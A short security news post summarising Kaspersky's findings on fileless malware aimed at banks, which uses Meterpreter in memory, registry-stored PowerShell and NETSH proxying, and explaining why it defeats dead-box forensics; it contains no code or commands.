Researchers from Kaspersky Lab have recently discovered a new “Fileless Malware” in the wild that is targeting banks and financial institutions globally, and due to the nature of the malware, is proving incredibly difficult to identify and forensically recover.
The new malware uses “Meterpreter” which is an existing Metasploit penetration testing tool that effectively plants malware payloads directly into a computer’s memory (RAM) rather than dumping the payload onto the file system as a file or series of files. The frustrating thing about this from a forensics perspective is that whenever a computer is switched off and power is no longer supplied to the memory modules on the motherboard the data held in RAM is lost, as it is volatile and requires a constant source of electricity to maintain its state. This makes any kind of “dead box forensics” (i.e. switching off the machine and taking it to the lab for analysis) incredibly difficult.
Additionally, this new malware also plants obfuscated powershell scripts planted directly into the windows registry which are designed to load Meterpreter straight into the computer memory on startup, again, leaving no further traces on the file system. This means the malware will run and start a fresh each time you reboot your machine.
Lastly, the attackers use Windows NETSH, which is a command-line utility that effectively allows you to modify network configurations of running computers, which you can either locally or remotely administer. The malware uses this utility to set up proxy connections in order to connect to the malware’s command and control server.
In essence, initial research suggests the only chances of forensic analysis of such infections are the RAM, network traffic and windows registry. All-in-all, not a lot to go on, unfortunately.
However, the research continues, so further learning should be released from Kaspersky in due course. In the meantime you can read further articles from the Hacker News and ComputerWorld Security, and also read the official Kaspersky report for more detailed information.